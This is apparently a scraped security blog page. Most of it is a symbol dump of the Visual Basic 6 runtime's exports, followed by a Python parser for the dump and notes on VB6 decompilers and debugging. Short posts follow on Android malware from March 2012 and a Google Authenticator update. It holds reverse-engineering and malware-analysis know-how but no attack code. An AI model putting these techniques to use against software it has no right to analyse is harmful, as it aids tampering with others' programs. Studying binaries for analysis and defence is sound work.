[C ] 444 (0x01BC) 336 (0x0150) __vbaUI1Var 0x000E4E13
[C ] 445 (0x01BD) 337 (0x0151) __vbaUbound 0x000DC65A
[C ] 446 (0x01BE) 338 (0x0152) __vbaUdtVar 0x00103911
[C ] 447 (0x01BF) 339 (0x0153) __vbaUnkVar 0x000DA1DF
[C ] 448 (0x01C0) 340 (0x0154) __vbaVar2Vec 0x00103AEC
[C ] 449 (0x01C1) 341 (0x0155) __vbaVarAbs 0x00107752
[C ] 450 (0x01C2) 342 (0x0156) __vbaVarAdd 0x001077C1
[C ] 451 (0x01C3) 343 (0x0157) __vbaVarAnd 0x00109589
[C ] 452 (0x01C4) 344 (0x0158) __vbaVarCat 0x000E697D
[C ] 453 (0x01C5) 345 (0x0159) __vbaVarCmpEq 0x00109922
[C ] 454 (0x01C6) 346 (0x015A) __vbaVarCmpGe 0x0010998C
[C ] 455 (0x01C7) 347 (0x015B) __vbaVarCmpGt 0x001099C1
[C ] 456 (0x01C8) 348 (0x015C) __vbaVarCmpLe 0x001099F6
[C ] 457 (0x01C9) 349 (0x015D) __vbaVarCmpLt 0x00109A2B
[C ] 458 (0x01CA) 350 (0x015E) __vbaVarCmpNe 0x00109957
[C ] 459 (0x01CB) 352 (0x0160) __vbaVarDateVar 0x000E0C9C
[C ] 460 (0x01CC) 353 (0x0161) __vbaVarDiv 0x00107689
[C ] 461 (0x01CD) 355 (0x0163) __vbaVarEqv 0x00109604
[C ] 462 (0x01CE) 356 (0x0164) __vbaVarErrI4 0x000E18F1
[C ] 463 (0x01CF) 357 (0x0165) __vbaVarFix 0x00107777
[C ] 464 (0x01D0) 358 (0x0166) __vbaVarForInit 0x001093CC
[C ] 465 (0x01D1) 359 (0x0167) __vbaVarForNext 0x001093FA
[C ] 466 (0x01D2) 360 (0x0168) __vbaVarIdiv 0x001076B2
[C ] 467 (0x01D3) 361 (0x0169) __vbaVarImp 0x0010962D
[C ] 468 (0x01D4) 362 (0x016A) __vbaVarIndexLoad 0x000DC43B
[C ] 469 (0x01D5) 363 (0x016B) __vbaVarIndexLoadRef 0x000DC457
[C ] 470 (0x01D6) 364 (0x016C) __vbaVarIndexLoadRefLock 0x000DC484
[C ] 471 (0x01D7) 365 (0x016D) __vbaVarIndexStore 0x000DC4B2
[C ] 472 (0x01D8) 366 (0x016E) __vbaVarIndexStoreObj 0x000DC4CD
[C ] 473 (0x01D9) 367 (0x016F) __vbaVarInt 0x0010779C
[C ] 474 (0x01DA) 373 (0x0175) __vbaVarLike 0x000E9542
[C ] 475 (0x01DB) 374 (0x0176) __vbaVarLikeVar 0x000E95E4
[C ] 476 (0x01DC) 375 (0x0177) __vbaVarMod 0x001076DB
[C ] 477 (0x01DD) 377 (0x0179) __vbaVarMul 0x00107660
[C ] 478 (0x01DE) 378 (0x017A) __vbaVarNeg 0x0010772D
[C ] 479 (0x01DF) 379 (0x017B) __vbaVarNot 0x00109564
[C ] 480 (0x01E0) 380 (0x017C) __vbaVarOr 0x001095B2
[C ] 481 (0x01E1) 381 (0x017D) __vbaVarPow 0x00107704
[C ] 482 (0x01E2) 382 (0x017E) __vbaVarSetObj 0x000DA01F
[C ] 483 (0x01E3) 383 (0x017F) __vbaVarSetObjAddref 0x000DA049
[C ] 484 (0x01E4) 384 (0x0180) __vbaVarSetUnk 0x000DA073
[C ] 485 (0x01E5) 385 (0x0181) __vbaVarSetUnkAddref 0x000DA09D
[C ] 486 (0x01E6) 386 (0x0182) __vbaVarSetVar 0x000DA0C7
[C ] 487 (0x01E7) 387 (0x0183) __vbaVarSetVarAddref 0x000DA0DD
[C ] 488 (0x01E8) 388 (0x0184) __vbaVarSub 0x001077EA
[C ] 489 (0x01E9) 389 (0x0185) __vbaVarTextCmpEq 0x00109A60
[C ] 490 (0x01EA) 390 (0x0186) __vbaVarTextCmpGe 0x00109ACA
[C ] 491 (0x01EB) 391 (0x0187) __vbaVarTextCmpGt 0x00109AFF
[C ] 492 (0x01EC) 392 (0x0188) __vbaVarTextCmpLe 0x00109B34
[C ] 493 (0x01ED) 393 (0x0189) __vbaVarTextCmpLt 0x00109B69
[C ] 494 (0x01EE) 394 (0x018A) __vbaVarTextCmpNe 0x00109A95
[C ] 495 (0x01EF) 395 (0x018B) __vbaVarTextLike 0x000E956C
[C ] 496 (0x01F0) 396 (0x018C) __vbaVarTextLikeVar 0x000E95FE
[C ] 497 (0x01F1) 397 (0x018D) __vbaVarTextTstEq 0x0010988C
[C ] 498 (0x01F2) 398 (0x018E) __vbaVarTextTstGe 0x001098BE
[C ] 499 (0x01F3) 399 (0x018F) __vbaVarTextTstGt 0x001098D7
[C ] 500 (0x01F4) 400 (0x0190) __vbaVarTextTstLe 0x001098F0
[C ] 501 (0x01F5) 401 (0x0191) __vbaVarTextTstLt 0x00109909
[C ] 502 (0x01F6) 402 (0x0192) __vbaVarTextTstNe 0x001098A5
[C ] 503 (0x01F7) 403 (0x0193) __vbaVarTstEq 0x001097F6
[C ] 504 (0x01F8) 404 (0x0194) __vbaVarTstGe 0x00109828
[C ] 505 (0x01F9) 405 (0x0195) __vbaVarTstGt 0x00109841
[C ] 506 (0x01FA) 406 (0x0196) __vbaVarTstLe 0x0010985A
[C ] 507 (0x01FB) 407 (0x0197) __vbaVarTstLt 0x00109873
[C ] 508 (0x01FC) 408 (0x0198) __vbaVarTstNe 0x0010980F
[C ] 509 (0x01FD) 410 (0x019A) __vbaVarXor 0x001095DB
[C ] 510 (0x01FE) 412 (0x019C) __vbaVargObj 0x00107350
[C ] 511 (0x01FF) 413 (0x019D) __vbaVargObjAddref 0x001073B8
[C ] 512 (0x0200) 550 (0x0226) rtcLeftBstr 0x000E6CE3
[C ] 513 (0x0201) 555 (0x022B) rtcLeftVar 0x000E6D36
[C ] 514 (0x0202) 588 (0x024C) rtcRightBstr 0x000E6DD8
[C ] 515 (0x0203) 593 (0x0251) rtcRightVar 0x000E6E3A
[C ] 516 (0x0204) 447 (0x01BF) rtcAnsiValueBstr 0x000E70B7
[C ] 517 (0x0205) 559 (0x022F) rtcLowerCaseBstr 0x000E7569
[C ] 518 (0x0206) 560 (0x0230) rtcLowerCaseVar 0x000E75A0
[C ] 519 (0x0207) 620 (0x026C) rtcTrimBstr 0x000E7601
[C ] 520 (0x0208) 621 (0x026D) rtcTrimVar 0x000E7621
[C ] 521 (0x0209) 553 (0x0229) rtcLeftTrimBstr 0x000E7834
[C ] 522 (0x020A) 554 (0x022A) rtcLeftTrimVar 0x000E7854
[C ] 523 (0x020B) 591 (0x024F) rtcRightTrimBstr 0x000E7A47
[C ] 524 (0x020C) 592 (0x0250) rtcRightTrimVar 0x000E7A67
[C ] 525 (0x020D) 608 (0x0260) rtcSpaceBstr 0x000E7DB9
[C ] 526 (0x020E) 609 (0x0261) rtcSpaceVar 0x000E7DFB
[C ] 527 (0x020F) 623 (0x026F) rtcUpperCaseBstr 0x000E7F8A
[C ] 528 (0x0210) 624 (0x0270) rtcUpperCaseVar 0x000E7FAA
[C ] 529 (0x0211) 549 (0x0225) rtcKillFiles 0x000D5D41
[C ] 530 (0x0212) 461 (0x01CD) rtcChangeDir 0x000D5C68
[C ] 531 (0x0213) 563 (0x0233) rtcMakeDir 0x000D5C89
[C ] 532 (0x0214) 585 (0x0249) rtcRemoveDir 0x000D5C9A
[C ] 533 (0x0215) 462 (0x01CE) rtcChangeDrive 0x000D64C7
[C ] 534 (0x0216) 452 (0x01C4) rtcBeep 0x000DC715
[C ] 535 (0x0217) 523 (0x020B) rtcGetTimer 0x000DC85D
[C ] 536 (0x0218) 614 (0x0266) rtcStrFromVar 0x000E07D5
[C ] 537 (0x0219) 453 (0x01C5) rtcBstrFromAnsi 0x000E0EBE
[C ] 538 (0x021A) 577 (0x0241) rtcPackDate 0x000D1978
[C ] 539 (0x021B) 578 (0x0242) rtcPackTime 0x000D19D8
[C ] 540 (0x021C) 506 (0x01FA) rtcGetDateValue 0x000D1A3E
[C ] 541 (0x021D) 521 (0x0209) rtcGetTimeValue 0x000D1AAD
[C ] 542 (0x021E) 508 (0x01FC) rtcGetDayOfMonth 0x000D1B9D
[C ] 543 (0x021F) 513 (0x0201) rtcGetHourOfDay 0x000D1C50
[C ] 544 (0x0220) 514 (0x0202) rtcGetMinuteOfHour 0x000D1C93
[C ] 545 (0x0221) 515 (0x0203) rtcGetMonthOfYear 0x000D1B5A
[C ] 546 (0x0222) 517 (0x0205) rtcGetPresentDate 0x000D1D19
[C ] 547 (0x0223) 518 (0x0206) rtcGetSecondOfMinute 0x000D1CD6
[C ] 548 (0x0224) 601 (0x0259) rtcSetDateVar 0x000D1DB1
[C ] 549 (0x0225) 600 (0x0258) rtcSetDateBstr 0x000D1DFB
[C ] 550 (0x0226) 604 (0x025C) rtcSetTimeVar 0x000D1FE7
[C ] 551 (0x0227) 603 (0x025B) rtcSetTimeBstr 0x000D203E
[C ] 552 (0x0228) 509 (0x01FD) rtcGetDayOfWeek 0x000D1BE0
[C ] 553 (0x0229) 524 (0x020C) rtcGetYear 0x000D1B17
[C ] 554 (0x022A) 493 (0x01ED) rtcFileReset 0x000D4156
[C ] 555 (0x022B) 487 (0x01E7) rtcFileAttributes 0x000D4203
[C ] 556 (0x022C) 540 (0x021C) rtcIsArray 0x000DC89D
[C ] 557 (0x022D) 541 (0x021D) rtcIsDate 0x000DC8B1
[C ] 558 (0x022E) 542 (0x021E) rtcIsEmpty 0x000DC988
[C ] 559 (0x022F) 543 (0x021F) rtcIsError 0x000DC99C
[C ] 560 (0x0230) 545 (0x0221) rtcIsNull 0x000DC9B4
[C ] 561 (0x0231) 546 (0x0222) rtcIsNumeric 0x000DC9CA
[C ] 562 (0x0232) 547 (0x0223) rtcIsObject 0x000DCAEE
[C ] 563 (0x0233) 633 (0x0279) rtcVarType 0x000DCB05
[C ] 564 (0x0234) 440 (0x01B8) rtDecFromVar 0x000E01FA
[C ] 565 (0x0235) 495 (0x01EF) rtcFileWidth 0x000D4199
[C ] 566 (0x0236) 537 (0x0219) rtcInputCount 0x000D3025
[C ] 567 (0x0237) 538 (0x021A) rtcInputCountVar 0x000D2FF7
[C ] 568 (0x0238) 494 (0x01EE) rtcFileSeek 0x000E544E
[C ] 569 (0x0239) 492 (0x01EC) rtcFileLocation 0x000E558A
[C ] 570 (0x023A) 491 (0x01EB) rtcFileLength 0x000E5618
[C ] 571 (0x023B) 481 (0x01E1) rtcEndOfFile 0x000D4332
[C ] 572 (0x023C) 525 (0x020D) rtcHexBstrFromVar 0x000E1290
[C ] 573 (0x023D) 526 (0x020E) rtcHexVarFromVar 0x000E1381
[C ] 574 (0x023E) 572 (0x023C) rtcOctBstrFromVar 0x000E13BB
[C ] 575 (0x023F) 573 (0x023D) rtcOctVarFromVar 0x000E14A3
[C ] 576 (0x0240) 488 (0x01E8) rtcFileCopy 0x000D5F0D
[C ] 577 (0x0241) 489 (0x01E9) rtcFileDateTime 0x000D612D
[C ] 578 (0x0242) 490 (0x01EA) rtcFileLen 0x000D61F8
[C ] 579 (0x0243) 511 (0x01FF) rtcGetFileAttr 0x000D6224
[C ] 580 (0x0244) 602 (0x025A) rtcSetFileAttr 0x000D624D
[C ] 581 (0x0245) 581 (0x0245) rtcR8ValFromBstr 0x000D325A
[C ] 582 (0x0246) 607 (0x025F) rtcSin 0x000DCB7F
[C ] 583 (0x0247) 468 (0x01D4) rtcCos 0x000DCBA8
[C ] 584 (0x0248) 619 (0x026B) rtcTan 0x000DCBD1
[C ] 585 (0x0249) 451 (0x01C3) rtcAtn 0x000DCC01
[C ] 586 (0x024A) 485 (0x01E5) rtcExp 0x000DCC0C
[C ] 587 (0x024B) 558 (0x022E) rtcLog 0x000DCC4D
[C ] 588 (0x024C) 587 (0x024B) rtcRgb 0x000DCC8D
[C ] 589 (0x024D) 580 (0x0244) rtcQBColor 0x000DCCE6
[C ] 590 (0x024E) 562 (0x0232) rtcMacId 0x000D4545
[C ] 591 (0x024F) 622 (0x026E) rtcTypeName 0x000DDEA0
[C ] 592 (0x0250) 544 (0x0220) rtcIsMissing 0x000DD6FD
[C ] 593 (0x0251) 582 (0x0246) rtcRandomNext 0x000DCD05
[C ] 594 (0x0252) 583 (0x0247) rtcRandomize 0x000DCD3A
[C ] 595 (0x0253) 569 (0x0239) rtcMsgBox 0x000DD132
[C ] 596 (0x0254) 534 (0x0216) rtcInputBox 0x000DD301
[C ] 597 (0x0255) 448 (0x01C0) rtcAppActivate 0x000DCE42
[C ] 598 (0x0256) 480 (0x01E0) rtcDoEvents 0x000CE0F7
[C ] 599 (0x0257) 598 (0x0256) rtcSendKeys 0x000CCFE4
[C ] 600 (0x0258) 606 (0x025E) rtcShell 0x000CCE69
[C ] 601 (0x0259) 450 (0x01C2) rtcArray 0x00103A13
[C ] 602 (0x025A) 415 (0x019F) __vbaVargUnk 0x00107420
[C ] 603 (0x025B) 416 (0x01A0) __vbaVargUnkAddref 0x00107482
[C ] 604 (0x025C) 421 (0x01A5) __vbaVerifyVarObj 0x000DA152
[C ] 605 (0x025D) 510 (0x01FE) rtcGetErl 0x000DC71E
[C ] 606 (0x025E) 616 (0x0268) rtcStringBstr 0x000E7E26
[C ] 607 (0x025F) 617 (0x0269) rtcStringVar 0x000E7F4D
[C ] 608 (0x0260) 625 (0x0271) rtcVarBstrFromAnsi 0x000E0F56
[C ] 609 (0x0261) 505 (0x01F9) rtcGetDateBstr 0x000D2349
[C ] 610 (0x0262) 507 (0x01FB) rtcGetDateVar 0x000D22B9
[C ] 611 (0x0263) 520 (0x0208) rtcGetTimeBstr 0x000D240B
[C ] 612 (0x0264) 522 (0x020A) rtcGetTimeVar 0x000D22FB
[C ] 613 (0x0265) 632 (0x0278) rtcVarStrFromVar 0x000E0944
[C ] 614 (0x0266) 611 (0x0263) rtcSqr 0x000DCC6E
[C ] 615 (0x0267) 527 (0x020F) rtcIMEStatus 0x000DD6E4
[C ] 616 (0x0268) 551 (0x0227) rtcLeftCharBstr 0x000E6D9A
[C ] 617 (0x0269) 552 (0x0228) rtcLeftCharVar 0x000E6DAD
[C ] 618 (0x026A) 589 (0x024D) rtcRightCharBstr 0x000E6E9E
[C ] 619 (0x026B) 590 (0x024E) rtcRightCharVar 0x000E6EB1
[C ] 620 (0x026C) 535 (0x0217) rtcInputCharCount 0x000D3118
[C ] 621 (0x026D) 536 (0x0218) rtcInputCharCountVar 0x000D30EA
[C ] 622 (0x026E) 612 (0x0264) rtcStrConvVar 0x000E8FBF
[C ] 623 (0x026F) 422 (0x01A6) __vbaWriteFile 0x000D50F3
[C ] 624 (0x0270) 512 (0x0200) rtcGetHostLCID 0x000CCDD0
[C ] 625 (0x0271) 469 (0x01D5) rtcCreateObject 0x000D973F
[C ] 626 (0x0272) 516 (0x0204) rtcGetObject 0x000D9CCA
[C ] 627 (0x0273) 449 (0x01C1) rtcAppleScript 0x000F6341
[C ] 628 (0x0274) 564 (0x0234) rtcMidBstr 0x000E6EDC
[C ] 629 (0x0275) 567 (0x0237) rtcMidVar 0x000E6F7B
[C ] 630 (0x0276) 531 (0x0213) rtcInStr 0x000E71C4
[C ] 631 (0x0277) 565 (0x0235) rtcMidCharBstr 0x000E6FE2
[C ] 632 (0x0278) 566 (0x0236) rtcMidCharVar 0x000E702F
[C ] 633 (0x0279) 532 (0x0214) rtcInStrChar 0x000E712F
[C ] 634 (0x027A) 438 (0x01B6) rtBstrFromErrVar 0x000E06A0
[C ] 635 (0x027B) 437 (0x01B5) rtBoolFromErrVar 0x000E0DAB
[C ] 636 (0x027C) 439 (0x01B7) rtCyFromErrVar 0x000E0426
[C ] 637 (0x027D) 441 (0x01B9) rtI2FromErrVar 0x000E0252
[C ] 638 (0x027E) 442 (0x01BA) rtI4FromErrVar 0x000E02C1
[C ] 639 (0x027F) 443 (0x01BB) rtR4FromErrVar 0x000E0320
[C ] 640 (0x0280) 444 (0x01BC) rtR8FromErrVar 0x000E038D
[C ] 641 (0x0281) 476 (0x01DC) rtcDateFromVar 0x000E0D3D
[C ] 642 (0x0282) 631 (0x0277) rtcVarFromVar 0x000E097E
[C ] 643 (0x0283) 459 (0x01CB) rtcCVErrFromVar 0x000E09BA
[C ] 644 (0x0284) 74 (0x004A) VarPtr 0x000DDE99
[C ] 645 (0x0285) 479 (0x01DF) rtcDir 0x000D53F7
[C ] 646 (0x0286) 472 (0x01D8) rtcCurrentDirBstr 0x000D535F
[C ] 647 (0x0287) 471 (0x01D7) rtcCurrentDir 0x000D52B6
[C ] 648 (0x0288) 502 (0x01F6) rtcFreeFile 0x000D4275
[C ] 649 (0x0289) 467 (0x01D3) rtcCompareBstr 0x000E7B12
[C ] 650 (0x028A) 457 (0x01C9) rtcBstrFromFormatVar 0x000F6348
[C ] 651 (0x028B) 456 (0x01C8) rtcBstrFromError 0x000DC75C
[C ] 652 (0x028C) 629 (0x0275) rtcVarFromError 0x000DC731
[C ] 653 (0x028D) 556 (0x022C) rtcLenCharVar 0x000E6BA0
[C ] 654 (0x028E) 557 (0x022D) rtcLenVar 0x000E6BC6
[C ] 655 (0x028F) 497 (0x01F1) rtcFixVar 0x000E09FC
[C ] 656 (0x0290) 446 (0x01BE) rtcAbsVar 0x000E0A4C
[C ] 657 (0x0291) 539 (0x021B) rtcIntVar 0x000E0A9C
[C ] 658 (0x0292) 605 (0x025D) rtcSgnVar 0x000E0AEC
[C ] 659 (0x0293) 423 (0x01A7) _adj_fdiv_m16i 0x000F0306
[C ] 660 (0x0294) 630 (0x0276) rtcVarFromFormatVar 0x000F642B
[C ] 661 (0x0295) 474 (0x01DA) rtcDateAdd 0x000D25A0
[C ] 662 (0x0296) 475 (0x01DB) rtcDateDiff 0x000D27DB
[C ] 663 (0x0297) 477 (0x01DD) rtcDatePart 0x000D2B0F
[C ] 664 (0x0298) 579 (0x0243) rtcPartition 0x000DD739
[C ] 665 (0x0299) 464 (0x01D0) rtcChoose 0x000DD9FD
[C ] 666 (0x029A) 483 (0x01E3) rtcEnvironVar 0x000DDB35
[C ] 667 (0x029B) 482 (0x01E2) rtcEnvironBstr 0x000DDB60
[C ] 668 (0x029C) 618 (0x026A) rtcSwitch 0x000DDD91
[C ] 669 (0x029D) 465 (0x01D1) rtcCommandBstr 0x0000A1BB
[C ] 670 (0x029E) 466 (0x01D2) rtcCommandVar 0x000DDE02
[C ] 671 (0x029F) 595 (0x0253) rtcSLN 0x000F65FF
[C ] 672 (0x02A0) 596 (0x0254) rtcSYD 0x000F6624
[C ] 673 (0x02A1) 473 (0x01D9) rtcDDB 0x000F667A
[C ] 674 (0x02A2) 528 (0x0210) rtcIPMT 0x000F67BA
[C ] 675 (0x02A3) 575 (0x023F) rtcPPMT 0x000F68A9
[C ] 676 (0x02A4) 574 (0x023E) rtcPMT 0x000F695D
[C ] 677 (0x02A5) 576 (0x0240) rtcPV 0x000F6A25
[C ] 678 (0x02A6) 486 (0x01E6) rtcFV 0x000F6AE0
[C ] 679 (0x02A7) 571 (0x023B) rtcNPer 0x000F6BAB
[C ] 680 (0x02A8) 584 (0x0248) rtcRate 0x000F6CCF
[C ] 681 (0x02A9) 530 (0x0212) rtcImmediateIf 0x000DDAE3
[C ] 682 (0x02AA) 529 (0x0211) rtcIRR 0x000F6ED6
[C ] 683 (0x02AB) 561 (0x0231) rtcMIRR 0x000F71C7
[C ] 684 (0x02AC) 570 (0x023A) rtcNPV 0x000F7361
[C ] 685 (0x02AD) 484 (0x01E4) rtcErrObj 0x000DEF7D
[C ] 686 (0x02AE) 445 (0x01BD) rtUI1FromErrVar 0x000E0DFE
[C ] 687 (0x02AF) 628 (0x0274) rtcVarDateFromVar 0x000E0D49
[C ] 688 (0x02B0) 424 (0x01A8) _adj_fdiv_m32 0x000F026E
[C ] 689 (0x02B1) 519 (0x0207) rtcGetSetting 0x000F753C
[C ] 690 (0x02B2) 597 (0x0255) rtcSaveSetting 0x000F76F2
[C ] 691 (0x02B3) 478 (0x01DE) rtcDeleteSetting 0x000F77AB
[C ] 692 (0x02B4) 503 (0x01F7) rtcGetAllSettings 0x000F7B37
[C ] 693 (0x02B5) 458 (0x01CA) rtcByteValueBstr 0x000E7096
[C ] 694 (0x02B6) 454 (0x01C6) rtcBstrFromByte 0x000E0E72
[C ] 695 (0x02B7) 626 (0x0272) rtcVarBstrFromByte 0x000E0E93
[C ] 696 (0x02B8) 463 (0x01CF) rtcCharValueBstr 0x000E710B
[C ] 697 (0x02B9) 455 (0x01C7) rtcBstrFromChar 0x000E0F81
[C ] 698 (0x02BA) 627 (0x0273) rtcVarBstrFromChar 0x000E0FC2
[C ] 699 (0x02BB) 599 (0x0257) rtcSetCurrentCalendar 0x000D2E89
[C ] 700 (0x02BC) 504 (0x01F8) rtcGetCurrentCalendar 0x000D2EB0
[C ] 701 (0x02BD) 425 (0x01A9) _adj_fdiv_m32i 0x000F033A
[C ] 702 (0x02BE) 500 (0x01F4) rtcFormatNumber 0x000F64A2
[C ] 703 (0x02BF) 498 (0x01F2) rtcFormatCurrency 0x000F653A
[C ] 704 (0x02C0) 501 (0x01F5) rtcFormatPercent 0x000F64EE
[C ] 705 (0x02C1) 499 (0x01F3) rtcFormatDateTime 0x000F645F
[C ] 706 (0x02C2) 634 (0x027A) rtcWeekdayName 0x000F6586
[C ] 707 (0x02C3) 568 (0x0238) rtcMonthName 0x000F65C4
[C ] 708 (0x02C4) 496 (0x01F0) rtcFilter 0x000F84A2
[C ] 709 (0x02C5) 533 (0x0215) rtcInStrRev 0x000F8299
[C ] 710 (0x02C6) 548 (0x0224) rtcJoin 0x000F8716
[C ] 711 (0x02C7) 610 (0x0262) rtcSplit 0x000F7DDB
[C ] 712 (0x02C8) 586 (0x024A) rtcReplace 0x000F89C4
[C ] 713 (0x02C9) 615 (0x0267) rtcStrReverse 0x000F8971
[C ] 714 (0x02CA) 594 (0x0252) rtcRound 0x000DE16C
[C ] 715 (0x02CB) 460 (0x01CC) rtcCallByName 0x000DE1B6
[C ] 716 (0x02CC) 470 (0x01D6) rtcCreateObject2 0x000D97D1
[C ] 717 (0x02CD) 613 (0x0265) rtcStrConvVar2 0x000E8FE9
[C ] 718 (0x02CE) 426 (0x01AA) _adj_fdiv_m64 0x000F02BA
[C ] 719 (0x02CF) 427 (0x01AB) _adj_fdiv_r 0x000EFDA9
[C ] 720 (0x02D0) 428 (0x01AC) _adj_fdivr_m16i 0x000F0406
[C ] 721 (0x02D1) 429 (0x01AD) _adj_fdivr_m32 0x000F036E
[C ] 722 (0x02D2) 430 (0x01AE) _adj_fdivr_m32i 0x000F043A
[C ] 723 (0x02D3) 431 (0x01AF) _adj_fdivr_m64 0x000F03BA
[C ] 724 (0x02D4) 432 (0x01B0) _adj_fpatan 0x000F09F6
[C ] 725 (0x02D5) 433 (0x01B1) _adj_fprem 0x000F0689
[C ] 726 (0x02D6) 434 (0x01B2) _adj_fprem1 0x000F0941
[C ] 727 (0x02D7) 435 (0x01B3) _adj_fptan 0x000F09F9
[C ] 728 (0x02D8) 436 (0x01B4) _allmul 0x000EEEED
[C ] 999 (0x03E7) 65 (0x0041) TipInvokeMethod2 0x000D8DD6
[C ] 1016 (0x03F8) 64 (0x0040) TipInvokeMethod 0x000D8EF6
[C ] 1024 (0x0400) 44 (0x002C) IID_IVbaHost 0x0002E640
[C ] 1025 (0x0401) 26 (0x001A) EbGetObjConnectionCounts 0x0000AB41
[C ] 2000 (0x07D0) 8 (0x0008) CreateIExprSrvObj 0x000EB2C7
[C ] 2010 (0x07DA) 27 (0x001B) EbGetVBAObject 0x000C946F
For more reference, I have also attached a copy of the symbol dump.
msvbvm60 symdmp.zip
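The dump lines above follow a fixed layout (flag, ordinal, hint, export name, address), so a short parser can turn them into an ordinal-to-name map, which is what you need when a VB6 binary imports msvbvm60 functions by ordinal only. This is an added example, not the author's tool; the sample lines are copied from the dump above and the function names are my own.

```python
import re
from typing import Dict, List, NamedTuple


class Export(NamedTuple):
    ordinal: int
    hint: int
    name: str
    rva: int


# One dump line: "[C ] <ordinal> (0x..) <hint> (0x..) <name> 0x<address>"
LINE_RE = re.compile(
    r"^\[\w?\s*\]\s+(\d+)\s+\(0x([0-9A-Fa-f]+)\)\s+(\d+)\s+\(0x[0-9A-Fa-f]+\)"
    r"\s+(\S+)\s+0x([0-9A-Fa-f]+)\s*$"
)

# Five lines taken from the symbol dump above (sample input for this example).
SAMPLE_DUMP = """\
[C ] 625 (0x0271) 469 (0x01D5) rtcCreateObject 0x000D973F
[C ] 626 (0x0272) 516 (0x0204) rtcGetObject 0x000D9CCA
[C ] 689 (0x02B1) 519 (0x0207) rtcGetSetting 0x000F753C
[C ] 690 (0x02B2) 597 (0x0255) rtcSaveSetting 0x000F76F2
[C ] 2010 (0x07DA) 27 (0x001B) EbGetVBAObject 0x000C946F
"""


def parse_symbol_dump(text: str) -> Dict[int, Export]:
    """Map each export ordinal to its name and RVA.

    Lines that do not match the layout, or whose decimal and hex ordinal
    disagree (a sign of a corrupted dump), are skipped rather than trusted.
    """
    table: Dict[int, Export] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ordinal, ordinal_hex, hint, name, rva = m.groups()
        if int(ordinal) != int(ordinal_hex, 16):
            continue
        table[int(ordinal)] = Export(int(ordinal), int(hint), name, int(rva, 16))
    return table


def resolve_ordinals(table: Dict[int, Export], ordinals: List[int]) -> List[str]:
    """Translate import-by-ordinal entries into names; unknown ordinals keep a placeholder."""
    return [table[o].name if o in table else f"ord_{o}" for o in ordinals]


if __name__ == "__main__":
    exports = parse_symbol_dump(SAMPLE_DUMP)
    print(resolve_ordinals(exports, [625, 690, 2010, 7]))
```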
Decompiling and Debugging
There are a lot of tools that can be used to decompile a Visual Basic 6.0 compiled COFF. You can go to http://www.woodmann.com/collaborative/tools/index.php/Category:Visual_Basic_Tools for the list of Visual Basic tools.
Decompilers:
- DoDi's Visual Basic 3/4 Decompiler
- RACEVB6
- VB Decompiler
- VBReFormer
- Whiskey Kon Tequilla VB P-Code Debugger
- P32Dasm
Debuggers:
When debugging, I personally use the IDA Pro IDC script found at http://www.hex-rays.com/products/ida/support/freefiles/vb.idc hand in hand with OllyDbg. I place breakpoints at every module or form entry point.
But to better understand a compiled Visual Basic executable or library, try creating and compiling one yourself from Visual Studio. From there, you will be able to easily understand how a VB program works. (Create a program that invokes a message box, release-compile it, then debug the executable.)
From: thecyberdung site
Wednesday, 4 April 2012
Android Malware March 2012 Roundup
| Date | Name |
| Mar 14, 2012 | Faketoken |
| Mar 15, 2012 | Boxer |
| Mar 20, 2012 | Antammi |
| Mar 22, 2012 | TGLoader |
| Mar 29, 2012 | DKFBootKit |
Fake Google Play
This fake Google Play site serves a malicious file called google_play.apk, tricking Russian users into thinking they are on the legitimate site.
Google Authenticator updated
Google recently updated Google Authenticator to version 2.15.
What's in this version:
1. New entry for Google Play, same great app
2. Updated look and feel
3. "Scan barcode" and "Manually add account" options moved to Menu > Add account.
When your phone is not connected to any network, Google Authenticator can be used to generate a valid verification code.
The verification code generated is then used in Google's 2-step verification process when signing in from a new device or phone.
Please visit this site for more info.